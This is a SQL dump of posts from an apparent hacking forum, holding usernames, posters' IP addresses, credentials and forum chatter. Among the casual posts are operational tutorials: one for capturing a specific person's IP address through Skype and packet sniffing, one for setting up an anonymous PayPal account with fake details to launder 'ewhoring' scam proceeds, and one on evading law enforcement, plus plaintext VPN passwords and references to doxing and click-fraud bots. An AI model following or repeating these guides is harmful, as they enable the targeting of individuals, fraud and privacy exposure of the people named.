[ Get ] My Mobile Business In A Box | Start Your Own Mobile Business |', '0', '62', 'R?????zo?', '1350633843', 'I will read it carefully and try it out later :)', '77.54.39.106', '1295394666', '1', '0', '0', '0', '1', 'b11466e822e3b9941ead3f94e5d55eb5', '0', '0'); INSERT INTO mybb_posts VALUES('5562', '936', '5257', '18', 'RE: 4 adf.ly bots with proxygrabber', '0', '62', 'R?????zo?', '1350633926', 'Thanks for this, i will try it out later :)\nCan this get you banned though?', '77.54.39.106', '1295394666', '1', '0', '0', '0', '1', '7347d442c72a78e5458c58e7d8f379a2', '0', '0'); INSERT INTO mybb_posts VALUES('5563', '984', '5533', '7', 'RE: What size pizza can you eat?', '0', '53', 'sirchamp', '1350635010', 'Lol. We only have \"normal sized\" and \"Family Pizza\" and the normal Pizza costs like 15 Dollars. Everything is fucking expensive here.', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '4d0ebd64a3dfa3b91075de7e572eb926', '0', '0'); INSERT INTO mybb_posts VALUES('5564', '964', '5433', '19', 'RE: [UPDATED] L33T Hacking Skype Resolver', '0', '53', 'sirchamp', '1350635213', 'Thanks alot. I already have one but this one looks even nicer :D', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', 'df9d02d5930397fcec0d8b3aac5a169e', '0', '0'); INSERT INTO mybb_posts VALUES('5565', '896', '5499', '23', 'RE: How to secure your Router', '0', '62', 'R?????zo?', '1350636898', '[quote=\'ƒ???????????g\' pid=\'5499\' dateline=\'1350608178\']\r\nLmao I could still hack your router but k...:P\r\n[/quote]\r\n\r\n\r\nHow would you do that?', '77.54.39.106', '1295394666', '1', '0', '0', '0', '1', '2a0df3c9de84265b64ebef11a92e6357', '0', '0'); INSERT INTO mybb_posts VALUES('5566', '948', '5336', '74', 'RE: MINECRAFT world download', '0', '62', 'R?????zo?', '1350636958', 'Yeah I can\'t download it for some reason, but looks cool though.', '77.54.39.106', '1295394666', '1', '0', '62', '1350637000', '1', '1ce44437331aff74d1c057741b704d70', '0', '1350637000'); INSERT INTO mybb_posts VALUES('5567', '964', '5433', '19', 'RE: [UPDATED] L33T Hacking Skype Resolver', '0', '62', 'R?????zo?', '1350637084', 'I\'m glad you got it to work, repped you.', '77.54.39.106', '1295394666', '1', '0', '0', '0', '1', '4bf4d64e97f5e1050cdf309a0fc10265', '0', '0'); INSERT INTO mybb_posts VALUES('5568', '984', '5533', '7', 'RE: What size pizza can you eat?', '0', '62', 'R?????zo?', '1350638003', 'This talk makes me hungry :(', '77.54.39.106', '1295394666', '1', '0', '0', '0', '1', 'df4a9ab3c2b1883d233ab2c28b4b766d', '0', '0'); INSERT INTO mybb_posts VALUES('5569', '989', '5544', '68', 'RE: Free Proxy script , Make your own Proxy browsing site like Hidemyass!!!', '0', '62', 'R?????zo?', '1350638238', 'Nice tutorial, thanks for sharing.\nKeep it up.', '77.54.39.106', '1295394666', '1', '0', '0', '0', '1', '828d544ff7607dc043c78d40d9107ca8', '0', '0'); INSERT INTO mybb_posts VALUES('5570', '988', '5543', '12', 'RE: [TUT] Watch +18 Youtube Videos Without an Account', '0', '62', 'R?????zo?', '1350638283', 'Thanks for sharing, didn\'t knew this.', '77.54.39.106', '1295394666', '1', '0', '0', '0', '1', '1e7b8ed532e2a788dc91651df26154f0', '0', '0'); INSERT INTO mybb_posts VALUES('5571', '987', '5542', '13', 'RE: [TUT] Using Metasploit to harvest all emails of a website', '0', '62', 'R?????zo?', '1350638369', 'Looks good, thanks for sharing.\nKeep it up.', '77.54.39.106', '1295394666', '1', '0', '0', '0', '1', 'd5bc1e85e0ba12deddb82d58a8e2758e', '0', '0'); INSERT INTO mybb_posts VALUES('5572', '986', '5535', '24', 'RE: What VM do you use and why?', '0', '62', 'R?????zo?', '1350638464', 'I used VMware back then, but my brother always liked Oracle (i think its called like that)', '77.54.39.106', '1295394666', '1', '0', '0', '0', '1', '5d2bcbf8c83efaa9e6931262ef2afb67', '0', '0'); INSERT INTO mybb_posts VALUES('5573', '983', '5495', '47', 'RE: MC PREMIUM GIVE AWAY', '0', '62', 'R?????zo?', '1350638519', 'Keep it up bro, nice share ;)', '77.54.39.106', '1295394666', '1', '0', '0', '0', '1', '6c9c0ab2d9b41d430999be124740d199', '0', '0'); INSERT INTO mybb_posts VALUES('5574', '987', '5571', '13', 'RE: [TUT] Using Metasploit to harvest all emails of a website', '0', '258', 'PiXEL^OG', '1350639042', '[quote=\'R?????zo?\' pid=\'5571\' dateline=\'1350638369\']\r\nLooks good, thanks for sharing.\r\nKeep it up.\r\n[/quote]\r\n\r\nYour welcome mate :)', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', 'b8be3d856983ff8a551df9bf3e3e88ba', '0', '0'); INSERT INTO mybb_posts VALUES('5575', '906', '4982', '42', 'RE: DOX of Kody Maxson', '0', '53', 'sirchamp', '1350640448', 'Beeing banned of HF must be really fucked up.', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', 'e06e3cc1d5032dd7667dd66c17903927', '0', '0'); INSERT INTO mybb_posts VALUES('5576', '906', '4982', '42', 'RE: DOX of Kody Maxson', '0', '62', 'R?????zo?', '1350641378', 'My thread gets deleted on HF, i think they don\'t allow Dox', '77.54.39.106', '1295394666', '1', '0', '0', '0', '1', 'dfee09ae90597a9510e7267e17e34d28', '0', '0'); INSERT INTO mybb_posts VALUES('5577', '983', '5573', '47', 'RE: MC PREMIUM GIVE AWAY', '0', '257', 'XxTREYZxX', '1350641818', '[quote=\'R?????zo?\' pid=\'5573\' dateline=\'1350638519\']\r\nKeep it up bro, nice share ;)\r\n[/quote]\r\n\r\nno worries enjoy them :O', '203.104.11.11', '-882373877', '1', '0', '0', '0', '1', 'ddd8670ac7d38458faf643c56f27cf50', '0', '0'); INSERT INTO mybb_posts VALUES('5578', '889', '4842', '3', 'RE: Vote for a new theme', '0', '53', 'sirchamp', '1350641841', 'I dont like any of them. Why do we need a new theme?', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', 'd699b9197f70e71079251153cfbb7d1e', '0', '0'); INSERT INTO mybb_posts VALUES('5579', '948', '5336', '74', 'RE: MINECRAFT world download', '0', '257', 'XxTREYZxX', '1350641914', 'its prob because of you version, this version is 1.3.1', '203.104.11.11', '-882373877', '1', '0', '0', '0', '1', 'c6ae6d8315473b4fca7fed581d7014be', '0', '0'); INSERT INTO mybb_posts VALUES('5580', '126', '5093', '15', 'RE: Adf.ly Bot', '0', '53', 'sirchamp', '1350646096', '[quote=\'iTzIpod\' pid=\'5093\' dateline=\'1350475124\']\r\nWait so this works 100% virus free?\r\n\r\nAnd should I run it in Sandboxie?\r\n[/quote]\r\n100% Virusfree. You do NOT have to run it in Sandboxie.', '48.40.189.25', '807976217', '1', '0', '0', '0', '1', 'f7e9495f5cb525fc37876f33019d0463', '0', '0'); INSERT INTO mybb_posts VALUES('5581', '986', '5572', '24', 'RE: What VM do you use and why?', '0', '205', 'mothered', '1350647515', '[quote=\'R?????zo?\' pid=\'5572\' dateline=\'1350638464\']\r\nI used VMware back then, but my brother always liked Oracle (i think its called like that)\r\n[/quote]\r\n\r\nYes, VMware Is certainly the most superior.\r\n\r\nOracle Is \"VirtualBox\", and just like Virtual PC 2007, Is available as a freeware download. This too, Is a pretty good VM.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '375587947baad9e0e681ce38f022d8e6', '0', '0'); INSERT INTO mybb_posts VALUES('5582', '973', '5454', '19', '[Junk]New HF Logo?', '0', '61', 'NXK', '1350647984', 'This thread has been junked.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO mybb_posts VALUES('5583', '981', '5480', '4', 'RE: Whatsup Holmes.', '0', '61', 'NXK', '1350648080', 'Welcome, Enjoy it and stay HQ.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '4eeec5bfa0fdc579d690dcb643edec0d', '0', '0'); INSERT INTO mybb_posts VALUES('5584', '918', '5088', '65', 'RE: I feel famous', '0', '205', 'mothered', '1350648371', 'That\'s Insane, a free fall that reached over 1,100km/h.\r\n\r\nI\'d have a heart attack at that speed.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '858be7aa3d7cdde2ac99788d653d5f59', '0', '0'); INSERT INTO mybb_posts VALUES('5585', '988', '5543', '12', 'RE: [TUT] Watch +18 Youtube Videos Without an Account', '0', '228', 'VirtualLegend', '1350648440', 'Nice Tutorial, How did you know that ;) \n\nKeep it Up', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'e0761fcce8e95bf03e3516166b096032', '0', '0'); INSERT INTO mybb_posts VALUES('5586', '907', '5528', '7', 'RE: Ohio Bus Driver Uppercuts Lady | Mortal Kombat Edit', '0', '2', 'Apathy', '1350649045', '[quote=\'??????????¢™\' pid=\'5528\' dateline=\'1350619527\']\r\n[quote=\'Apathy\' pid=\'5527\' dateline=\'1350617582\']\r\nNot bad. I like someone else footage better though.\r\n[/quote]\r\n\r\nThats okay with me, I didnt do a pro edit because im not an editor just a gamer.\r\n[/quote]\r\n\r\nI meant their is better camera footage.', '173.206.138.180', '-1378973004', '0', '0', '0', '0', '1', '5b8cf77c81aa46c45e4106373b1c9d38', '0', '0'); INSERT INTO mybb_posts VALUES('5587', '988', '5585', '12', 'RE: [TUT] Watch +18 Youtube Videos Without an Account', '0', '258', 'PiXEL^OG', '1350649275', '[quote=\'VirtualLegend\' pid=\'5585\' dateline=\'1350648440\']\r\nNice Tutorial, How did you know that ;) \r\n\r\nKeep it Up\r\n[/quote]\r\n\r\nIts just a trick i picked up along the way! :) \r\n\r\nIve been in all kinds of hacking fields for 2 years learnt almost all there is to know for the most part , and i ain\'t even 17 yet\n[hr]\nAlso Thanks Virtual and Reloadzor for the feedback :D', '139.190.235.246', '-1950422026', '0', '0', '258', '1350649308', '1', '0aa8f63662e9e2e68467661fa3af28f4', '0', '0'); INSERT INTO mybb_posts VALUES('5588', '948', '5336', '74', 'RE: MINECRAFT world download', '0', '62', 'R?????zo?', '1350650040', 'yeah I can\'t get it to work.', '89.214.163.182', '1507238838', '1', '0', '0', '0', '1', 'e13c7b93b0a3dd83d2bda447ec705fc0', '0', '0'); INSERT INTO mybb_posts VALUES('5589', '988', '5543', '12', 'RE: [TUT] Watch +18 Youtube Videos Without an Account', '0', '62', 'R?????zo?', '1350650104', 'No worries, repped you :)', '89.214.163.182', '1507238838', '1', '0', '0', '0', '1', 'fbf6ee27267086e19dfd8d9f65c3cf45', '0', '0'); INSERT INTO mybb_posts VALUES('5590', '986', '5535', '24', 'RE: What VM do you use and why?', '0', '62', 'R?????zo?', '1350650166', 'yeah VMware is awesome, my teacher recommend it to me so.', '89.214.163.182', '1507238838', '1', '0', '0', '0', '1', '1eb4092d2dbf934b12ec22771aaca9f7', '0', '0'); INSERT INTO mybb_posts VALUES('5591', '126', '315', '15', 'RE: Adf.ly Bot', '0', '62', 'R?????zo?', '1350650229', 'Nice, thanks for sharing this, I will use this one then.\nHeard some nice feedback about this bot :)', '89.214.163.182', '1507238838', '1', '0', '0', '0', '1', 'dbd7b01c35e14b796031950167a45052', '0', '0'); INSERT INTO mybb_posts VALUES('5592', '991', '0', '14', 'VPN Accounts With Guide :)', '0', '62', 'R?????zo?', '1350650722', '[align=center]\r\n\r\nGUIDE TO SETUP VPN :\r\n\r\nOpen up network and sharing center from Control Panel, and choose Set up a new connection or network.\r\n\r\n[img]http://www.windows7hacker.com/wp-content/uploads/2009/08/image.png[/img]\r\n\r\nThere are two options in the Connect to a Workplace window. 99% of the time you just need to pick the first option, unless your company only allows you to dial in using a phone line.\r\n\r\n[img]http://www.windows7hacker.com/wp-content/uploads/2009/08/image1.png[/img]\r\n\r\nType in the address in either domain name or IP address, and name the connection in the destination name box. And click Next.\r\n\r\n[img]http://www.windows7hacker.com/wp-content/uploads/2009/08/image2.png[/img]\r\n\r\nYou can leave all user login info blank if you feel safe that way in the next window. And click Create. You’re all set if you see the next window as below.\r\n\r\n[img]http://www.windows7hacker.com/wp-content/uploads/2009/08/image3.png[/img]\r\n\r\nTo launch it, simply click the small network icon on the system tray at the bottom right corner, and pick the connection we just created from the popup list, and connect.\r\n\r\n[img]http://www.windows7hacker.com/wp-content/uploads/2009/08/image4.png[/img]\r\n\r\nType in your user name and password, and you are on your way connecting your Windows 7 to your company network.\r\n\r\n[img]http://www.windows7hacker.com/wp-content/uploads/2009/08/image5.png[/img]\r\n\r\n[color=#FF0000][size=x-large]Link address:vpn1.sshour.com\r\nUsername: sshour1\r\nPassword: 8cfba3\r\nLocation : U.S.A-Fremont\r\n\r\nLink address:vpn2.sshour.com\r\nUsername: sshour2\r\nPassword: 567c3m\r\nLocation : U.S.A-Los angeles\r\n\r\nLink address:vpn3.sshour.com\r\nUsername: sshour3\r\nPassword:vi64y5\r\nLocation :U.S.A-San jose\r\n \r\nLink address:vpn4.sshour.com\r\nUsername: sshour4\r\nPassword:246jk5\r\nLocation :U.S.A-Seattle\r\n\r\nLink address:vpn5.sshour.com\r\nUsername: sshour5\r\nPassword:t1bn89\r\nCountry:U.S.A-Kansas\r\n\r\nLink address:vpn6.sshour.com\r\nUsername: sshour6\r\nPassword:3nzeha\r\nLocation :Switzerland-Estonia\r\n[/size][/color]\r\n\r\n[/align]', '89.214.163.182', '1507238838', '1', '0', '0', '0', '1', '6212d32c830630e43120c59c46506511', '0', '0'); INSERT INTO mybb_posts VALUES('5593', '992', '0', '17', '[GUIDE] Verifying a PayPal Account FREE+ANONYMOUSLY', '0', '62', 'R?????zo?', '1350650947', '[b][color=#FF0000]*You can only do this once on the same IP, use proxies/VPN to make multiple cards*[/color][/b]\n\nI thought I may as well make a little tutorial. The most important part of ewhoring is staying anonymous and making money, right? Right. The trouble of making a new PayPal account is that they try to make it hard for you to stay anonymous. I\'ll show you real quick how to obtain a free virtual visa to use with your ewhoring paypal account, so you can send the money you\'ve earned to your main paypal account. \n\nSince some people can\'t get entropay to work for them or they\'re saying it\'s patched or whatever, http://www.siteslike.com/similar/entropay.com\n\n1. Go to https://www.entropay.com/\n2. Click \'Sign up now!\' on the right\n3. Fill in the forms (Use fake info, you\'re trying to be anonymous)\n4. Now it\'ll ask you if you want to fund your account with a credit card or a bank account, choose bank account\n5. Now it\'ll bring you to a screen with your virtual credit card details and a form below it giving you the option to load money onto it. \n6. Go to PayPal and find somewhere where it states your limits and select \'Lift limits\' \n7. Enter in the credit card details from entropay \n8. Verify your paypal account\n\nIt\'s that simple :)\n\nWhen you get the money onto your ewhore account, send it to a secondary account right away and let it sit for a couple of days and then transfer it to your main paypal account. I\'ve found this to be the most successful way in avoiding limitations on your account that matters. \n\n[align=center][size=xx-small]All content posted in this thread is for educational purposes ONLY, I the poster am not responsible for what readers do with this information.[/size][/align]', '89.214.163.182', '1507238838', '1', '0', '62', '1350651029', '1', '15954141b809c285f9c4342e50025760', '0', '1350651029'); INSERT INTO mybb_posts VALUES('5594', '922', '5338', '9', 'RE: ???EFYU.net || Easy $20/hour || Cashout with hundreds of methods!???', '0', '270', 'LCS', '1350651248', '[quote=\'?(???)?TREYZ?(???)?\' pid=\'5338\' dateline=\'1350555393\']\r\n[quote=\'LCS\' pid=\'5337\' dateline=\'1350554787\']\r\n[quote=\'?(???)?TREYZ?(???)?\' pid=\'5323\' dateline=\'1350552748\']\r\nlooks great i\'m definitely gonna try it out :)\r\n[/quote]\r\n\r\nThanks! I hope you enjoy it! :)\r\n[/quote]\r\n\r\ni will enjoy \r\nand hope it turns out good:)\r\n[/quote]\r\nHave a review you could post for our users? :)', '2.124.223.31', '41738015', '1', '0', '0', '0', '1', '14ec9e2b96ed55a9c7fffc01fada44b2', '0', '0'); INSERT INTO mybb_posts VALUES('5595', '993', '0', '12', 'Most complete guide to be anonymous', '0', '62', 'R?????zo?', '1350651294', '[align=center]Hello L33t Hacking,\n\nHere is my first full guide to remain almost COMPLETELY if not FULLY anonymous on the Internet. \n\nThis guide will be simple, pro, and straight to the point.[/align]\n\n\n[align=center][color=#9400D3][size=large]?????[/size][/color][/align]\n[align=center][size=large][b][color=#000000]?[/color][/b][b][color=#FFD700] Social engineering and your behavior [/color][/b][b][color=#000000]?[/color][/b][/size][/align]\n\n[align=center]\n[color=#00BFFF][b]Basic rule:[/b][/color]\n Blend in with the crowd, disperse into the stream. Keep a low profile. Don\'t try to be special. Don\'t try to be a smart ass. Feds are many. Heroes only exist in comic books keep that in mind! There are no old heroes; there are only young heroes and dead heroes.[/align]\n\n[color=#FF0000]DO NOT:[/color]\n[list]\n[*]Include personal information in your screen name. \n[/list]\n[list]\n[*]Discuss personal information, your address or where you\'re from. \n[/list]\n[list]\n[*]Mention your gender, tattoos, scars, piercings, body modifications, your weight or your physical and/or psychological capacities (got the idea?).\n[/list]\n[list]\n[*]Mention your profession or hobbies or involvement in other activist groups. \n[/list]\n[list]\n[*]Mention whether you\'re in a relationship.\n[/list]\n[list]\n[*]Use special characters, which are existent only in your language, as they would reveal where you are from. \n[/list]\n[list]\n[*]Give even bogus info. Lot\'s of no\'s, make a yes.\n[/list]\n[list]\n[*]Blend anything from your real life.\n[/list]\n[list]\n[*]Mention congresses that you have been at, schools or universities, etc. \n[/list]\n[list]\n[*]Mention your time zone, this can reveal where you live. \n[/list]\n[list]\n[*]Connect at the same time regularly. Try to alternate.\n[/list]\n[list]\n[*]Post on the public net while you are in the IRC, and definitely do not mention that you are posting something on Twitter. This is easy to correlate. Stagger your login & log out times on FaceBook, Twitter & IRC.\n[/list]\n[list]\n[*]Discuss whether you are personally DDoSing or writing How-To’s or making graphics etc. or not, just discuss general strategy. \n[/list]\n[list]\n[*]Post pictures hosted on Facebook. The filename contains your profile ID.\n[/list]\n\n[align=center][color=#9400D3][size=large]?????[/size][/color][/align]\n\n[align=center]\n[size=large][b][color=#000000]?[/color][/b][b][color=#FFD700] Technical [/color][/b][b][color=#000000]?[/color][/b][/size][/align]\n\n[align=center]I am personally using Firefox. Google Chrome to me is shit and I\'ve had a few problems before. Firefox is the BEST.\n\nUseful [b](mandatory)[/b] plugins/extensions for Firefox. You [b][color=#FFD700]MUST[/color][/b] have these.\n[/align]\n[size=medium]\n\n[size=small][align=center][b]I personally use all these plugins, they are excellent.[/b][/align][/size]\n\n[list]\n[*][color=#00BFFF]Plugins & extensions for Firefox[/color]\n[/list][/size]\n[color=#FFA500]Better Privacy[/color] (Removes persistent cookies from flash stuff >> *.sol) \nhttps://addons.mozilla.org/fr/firefox/addon/betterprivacy/\n\n[color=#FFA500]NoScript[/color] (blocks Javascript) \nhttps://addons.mozilla.org/fr/firefox/addon/noscript/\n\n[color=#FFA500]AdBlock Plus[/color] (blocks Ads) \nhttps://addons.mozilla.org/fr/firefox/addon/adblock-plus/?src=search\n\n[color=#FFA500]Element Hider for Adblock Plus[/color]\nhttps://addons.mozilla.org/fr/firefox/addon/elemhidehelper/?src=search\n\n[color=#FFA500]Ghostery[/color] (Protect your privacy. See who\'s tracking your web browsing and block them with Ghostery)\nhttps://addons.mozilla.org/fr/firefox/addon/ghostery/?src=search\n\n[color=#FFA500]TACO[/color] (More adblocking)\nhttps://addons.mozilla.org/fr/firefox/addon/beef-taco-targeted-advertising/?src=search\n\n[color=#FFA500]RefControl[/color] (Control what gets sent as the HTTP Referer on a per-site basis.)\nhttps://addons.mozilla.org/fr/firefox/addon/refcontrol/?src=search\n\n[color=#FFA500]WorldIP[/color] (flag and datacenter, ping and traceroute)[/color]\n(REAL location of web server,IP,Datacenter,Ping,Traceroute,RDNS,AS. Often shows different countries from similar add-ons,because it is based on data from core routers worldwide,and not on whois data.Real Google\'s data centers. Providers looking glasses.)\nhttps://addons.mozilla.org/fr/firefox/addon/worldip-flag-and-datacenter-pi/?src=search\n\n[color=#FFA500]Flagfox[/color] (Shows the flag of the website) \nhttps://addons.mozilla.org/fr/firefox/addon/flagfox/?src=search\n\n[color=#FFA500]GoogleSharing [/color](GoogleSharing provides a level of anonymity that will prevent google from tracking your searches and web activity.)\nhttps://addons.mozilla.org/fr/firefox/addon/googlesharing/?src=search\n\n[color=#FFA500]Scroogle.org[/color] (lets you search with Google anonymously).\nhttps://addons.mozilla.org/fr/firefox/addon/scroogle-ssl-search/?src=search\n\n[color=#FFA500]User Agent Switcher[/color] (Sends bogus browser identity to servers.)\nhttps://addons.mozilla.org/fr/firefox/addon/user-agent-switcher/?src=search\n\n[color=#FFA500]HTTPS Finder[/color] HTTPS Finder automatically detects and enforces HTTPS connections when available. It also provides one-click creation and in-browser editing for HTTPS Everywhere rules.\nhttps://addons.mozilla.org/fr/firefox/addon/https-finder/?src=search\n\n[color=#FFA500]Download TOR[/color] Download Torbutton for Firefox (enable or disable the browser\'s use of Tor)\nhttps://www.torproject.org/torbutton\n[color=#00BFFF]• [/color]Make sure your cached data is securely destroyed before re-starting firefox by the following \'debug\' procedure - you\'ll need to go to Start > Run and then open \'cmd\' for Command Prompt.\n\n[align=center][img]http://i.imgur.com/39etf.png[/img][/align]\n\n\n[align=center][color=#9400D3][size=large]?????[/size][/color][/align]\n\n[align=center][b][color=#00BFFF]Basic Rule:[/color][/b]\n Use as many security layers as possible. The question is not whether you are paranoid, but whether you are paranoid enough? A good start is to use a VPN A proxy will also do, but it is not as secure as a VPN. Always use as many security layers as possible. Make sure to use them in the right way. If you don\'t know how to use them, learn first. [/align]\n\n[align=center][size=large][b][color=#FFD700] VPN [/color][/b][/size][/align]\n[align=justify]When thinking of a VPN service, think first about the legislation of the country. A USA VPN might provide user data upon warrant issue. In other countries such as Sweden and Iceland, this is unlikely to happen. They have a strong privacy policy, which makes it harder for law enforcement agencies to get access. In addition, some servers do not keep logs of users. Also try to get VPN services that accept anonymous payments (For those that keep user billing information)[/align]\n[color=#00BFFF][b]More info:[/b][/color] https://secure.wikimedia.org/wikipedia/en/wiki/Vpn\n\nFree VPNs - [color=#FF0000]Not recommended.[/color] If they aren\'t selling you a service [size=medium][b]they are selling you.[/b][/size]\n[b]\n[color=#FF0000]Red List[/color][/b]\n[list]\n[*] http://cyberghostvpn.com \n[/list]\n[list]\n[*] http://hotspotshield.com - Occasionally hijacks your traffic to redirect you to advertisers. \n[/list]\n[list]\n[*] http://proxpn.com \n[/list]\n[list]\n[*] https://anonymityonline.org\n[/list]\n\n[size=medium][list]\n[*][color=#00BFFF][b]Use the proxies in conjunction with a VPN. [/b][b][color=#FFD700]*IMPORTANT*[/color][/b][/color]\n[/list][/size]\n\n[b][color=#FFA500]Proxies[/color][/b]\n1- http://www.freeproxies.org \n2- http://www.socks24.org \n3- http://www.samair.ru/proxy\n\n[b][color=#FFA500]VPN [/color][/b]\nhttp://cyberghostvpn.com \nhttp://hotspotshield.com \nhttp://proxpn.com \nhttps://anonymityonline.org \nhttp://www.swissvpn.net \nhttp://perfect-privacy.com \nhttps://www.ipredator.se \nhttp://www.anonine.se \nhttps://www.vpntunnel.se\n http://www.bestfreevpn.com \nhttp://www.your-freedom.net \nhttp://www.ultravpn.fr \nhttp://www.itshidden.com \nhttp://www.thefreevpn.com \nhttp://www.packetix.net \n\n[b][color=#FFA500]Commercial VPN providers[/color][/b]\nhttp://www.swissvpn.net \nhttp://perfect-privacy.com \nhttps://www.ipredator.se \nhttp://www.anonine.se \nhttps://www.vpntunnel.se \nhttp://www.relakks.com \nhttp://www.steganos.com \nhttp://www.bananavpn.net > [color=#FFA500]logs IPs[/color]\nhttp://www.strongvpn.com > [color=#FFA500]logs IPs [/color]\nhttp://www.secureix.com \nhttp://www.secretsline.com \n\n\n[align=center][color=#9400D3][size=large]?????[/size][/color][/align]\n[b][align=center]\n[color=#FFD700]Portable Software[/color][/align][/b]\n[align=justify]\n Portable software is a software which you can run from an USB drive, so that it leaves almost no traces on your computer.[/align]\n\n[list]\n[*] http://portableapps.com\n[/list]\n[list]\n[*] http://portableapps.com/apps/internet/firefox_portable \n[/list]\n[list]\n[*] http://portable-i2p.blogspot.com \n[/list]\n[b]\nNOTE: [/b] I will not go into details in here as I never tried it but it is a really good information to know.\n\n[align=center][color=#9400D3][size=large]?????[/size][/color][/align]\n[align=center][color=#FFD700][b]Privacy Box[/b][/color][/align]\n\nThe PrivacyBox provides non-tracked (and also anonymous) contact forms. It is running primarily for journalists, bloggers and other publishers. But it is open for other people too. Think about an electronic mailbox. https://privacybox.de/index.en.html\n\n\n\n[align=center][color=#9400D3][size=large]?????[/size][/color][/align]\n[color=#FFD700][b][align=center]System Safety[/align][/b][/color]\n\n[align=center][color=#00BFFF][b]Basic rule:[/b][/color] \nSecurity is a continuing process, not a state. Do audits on a regular and scheduled basis. And do encrypted backups. Backups are important, as there are two types of people, those who have backups and those who have lost their data.[/align]\n[b]\nUse the operating system you are familiar with (Linux and Unix are better though)[/b]\n\n[list]\n[*] Uninstall everything you not need.\n[/list]\n[list]\n[*]Disable all remote tools.\n[/list]\n[list]\n[*]Shred or encrypt /temp, /var/temp and all world-readable files.\n[/list]\n[list]\n[*] Use Linux for activism purposes. Inside Linux use virtual machines. Use truecrypt + removable devices + hidden volumes if you plan on reusing a virtual machine more than once. - This is just for those who have knowledge of Linux.\n[/list]\n[list]\n[*]Encrypt your hard disk ( [color=#32CD32]Truecrypt: [/color]http://www.truecrypt.org )\n[/list]\n[list]\n[*] Never ever keep logs.\n[/list]\n[list]\n[*] If you detect any unwanted activity INSIDE your computer, shut down the Internet, and reinstall everything. \n[/list]\n[list]\n[*] If you think your router might have been hacked, contact your ISP at once, reset it, and/or reinstall its firmware or buy a new one.\n[/list]\n\nI hope that you guys found this \'\'tutorial\'\' made by me useful, as it is intended to be with information that are trustworthy. \nThis tutorial took me 5 hours to make to make it as much complete as possible, a vouch is appreciated :)\n\nFeel free to ask anything, for any changes, PM ME.\n\n[color=#000000][b]\nSTAY ANONYMOUS[/b][/color][color=#FF1493]~[/color]\n\ncredits: -NerdsLegend', '89.214.163.182', '1507238838', '1', '0', '62', '1350682319', '1', '7ebbafce50ca650d4c120cece4528332', '0', '1350682319'); INSERT INTO mybb_posts VALUES('5632', '996', '5622', '19', '[Junk]1000 PREMIUM ACCOUNTS!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!', '0', '228', 'VirtualLegend', '1350684281', 'This thread has been junked.', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO mybb_posts VALUES('5596', '994', '0', '18', 'Getting IP\'s of Facebook contacts! [TUT]', '0', '62', 'R?????zo?', '1350651631', '[b][color=#1E90FF]Hey guys!I\'ll be showing you how to get the IP of someone that you don\'t have as a contact on Skype, AIM, MSN etc, but you have them on Facebook. Although this method uses Skype to get their IP.[/color][/b]\n\n[b][color=#32CD32]Step 1 - The first thing you wanna do is open your Skype, click the arrow next to All at the top of your contacts list and you get a drop down menu. Then click Facebook.[/color][/b]\n[color=#FF0000][b][spoiler][IMG]http://img803.imageshack.us/img803/7735/a49a0a8b84f54d4d84ec424.png[/IMG][/spoiler][/b][/color]\n\n[color=#32CD32][b]Step 2 - Now you see you can connect to Facebook. Click the button saying Connect to Facebook. In your Skype window you will now see a login page for Facebook. All you do now is log in, then go back to the drop down menu from step one and click Facebook again to re-load.\n[color=#FF0000](No picture for this part as it\'s pretty easy to figure out)[/color]\n\nStep 3 - You should now see all your Facebook contacts. What you now want to do is separate your main Skype window where your chats are, from your contact list. (See picture)\nYou are doing this to make it easier for grabbing the person\'s IP address.[/b][/color]\n[color=#FF0000][b][spoiler][IMG]http://img803.imageshack.us/img803/8420/02c3370e8daf47bba1542bb.png[/IMG][/spoiler][/b][/color]\n\n[b][color=#32CD32]Step 4 - Now download SmartSniff (download: http://www.nirsoft.net/utils/smsniff_setup.exe) and once installed, open it. Open a chat with your target through your Facebook contact list on Skype.\n\nStep 5 - Before doing the following, I strongly advise that the only thing you have open is the chat between you and your target. After that, click the green Play button on SmartSniff and then start spamming them with messages or single letters. Do this for about 5-10 seconds and then click the red Stop button right next to the play button.\n\nYou should now get IP\'s showing up in SmartSniff. You\'re probably thinking how the hell do you know which IP belongs to your target, so I\'ll explain that. When you were spamming them, that increased the size of the packet a lot, so in most cases it\'ll be the IP with the largest packet size.\nAnother way is by making the size of both the chat window and the SmartSniff window smaller, and having them next to each other. When you are spamming the person, you will see the packet size of one of the IP\'s increasing rapidly. This will probably be the IP address of your target.[/color][/b]\n[color=#FF0000][b][spoiler][IMG]http://img811.imageshack.us/img811/5347/2s7if5c.png[/IMG][/spoiler][/b][/color]\n[color=#FF0000][b]NOTE: Sometimes the target\'s IP isn\'t the largest packet size if you have other programs running.[/b][/color]\n\n[b][color=#1E90FF][size=large]The end! You now have IP address of your target and you can do whatever the hell you want with it![/b][/color][/size]', '89.214.163.182', '1507238838', '1', '0', '62', '1350651675', '1', '03ee0722a9a606737ff9f6d318c9b543', '0', '1350651675'); INSERT INTO mybb_posts VALUES('5597', '901', '4930', '19', 'RE: L33THacking Skype Resolver!', '0', '53', 'sirchamp', '1350653123', 'It worked for me. And still works.', '217.239.68.136', '-638630776', '1', '0', '0', '0', '1', '92598158de3dff19f440d48ea7ff0d4e', '0', '0'); INSERT INTO mybb_posts VALUES('5598', '690', '3516', '69', 'RE: What are your fav or which coding languages do you know?', '0', '61', 'NXK', '1350653156', 'I know html and vb.net, I took classes for them in high school. I wish i learned java or c++ though', '38.104.158.106', '644390506', '1', '0', '0', '0', '1', '2a22e41ab5c6116c84cb89e799cd9b6f', '0', '0'); INSERT INTO mybb_posts VALUES('5599', '690', '3516', '69', 'RE: What are your fav or which coding languages do you know?', '0', '258', 'PiXEL^OG', '1350653559', 'I know : VB.NET (Mastered) , HTML and CSS (They are pretty much the same) , PHP , a little C# and Pearl', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', '55d25b3a275db6695ff631c2c27910f2', '0', '0'); 